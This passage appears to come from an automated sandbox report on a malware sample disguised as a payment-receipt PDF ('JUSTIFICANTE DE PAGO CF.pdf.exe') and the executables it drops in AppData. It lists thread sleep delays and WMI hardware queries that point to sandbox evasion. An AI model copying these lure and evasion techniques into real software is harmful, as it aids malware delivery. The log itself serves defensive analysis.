                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98671s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98452s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98343s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98124s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98014s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97796s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97686s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97577s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97358s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99890s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99776s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99672s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99562s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99453s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99343s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99234s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99125s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -99015s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98906s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98796s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98687s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98578s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98468s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98359s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98249s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98140s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -98030s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97921s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97812s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97702s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97593s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97476s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exe TID: 3624Thread sleep time: -97375s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -7378697629483816s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4476Thread sleep count: 933 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599890s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4476Thread sleep count: 2100 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599781s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599672s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599547s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599438s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599313s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599195s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -599078s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598969s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598859s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598641s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598516s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598391s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598281s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 1960Thread sleep time: -598151s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 5480Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep count: 35 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -32281802128991695s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -100000s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99875s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 572Thread sleep count: 1665 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 572Thread sleep count: 8164 > 30
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99766s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99641s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99526s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -198844s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99313s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99188s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99063s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98954s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98829s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98704s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98579s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98454s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98329s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98204s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98079s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97954s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97829s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97703s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97594s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97485s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -97360s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99969s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99859s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99640s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99531s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -99007s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98862s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98734s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98498s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98391s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98281s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -98157s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96883s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96761s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96656s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96547s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96422s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96312s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96203s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -96094s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -95969s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -95859s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -95750s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -95641s >= -30000s
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exe TID: 4836Thread sleep time: -95531s >= -30000s
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\repeat\repeat.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599890Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599671Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599562Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599399Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599296Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599180Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 599062Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598953Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598812Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598703Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598593Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598484Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598375Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598265Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598156Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 598046Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597937Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597827Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 597718Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99891Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99766Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99657Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99532Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99407Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99293Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99172Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99063Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98953Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98844Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98719Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98609Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98500Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98391Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98282Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98157Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 98032Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97907Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97797Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97688Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97563Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97438Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97324Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97204Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 97079Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96954Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96829Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96704Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96579Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96454Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96329Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96204Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 96078Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95969Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95860Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95735Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95610Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95485Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95360Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95235Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 95110Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 94985Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 94860Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99938Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99813Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99688Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99563Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99453Jump to behavior
                            Source: C:\Users\user\Desktop\JUSTIFICANTE DE PAGO CF.pdf.exeThread delayed: delay time: 99344Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 600000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599890Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599781Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599671Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599562Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599453Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599343Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599234Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599125Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 599015Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598906Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598796Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598687Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598578Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598468Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598359Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598247Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 598097Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 597968Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 597856Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 100000Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99875Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99765Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99656Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99547Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99434Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99326Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99203Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 99089Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98969Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98844Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98734Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98625Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98515Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98406Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98297Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\Reramvw.exeThread delayed: delay time: 98187Jump to behavior
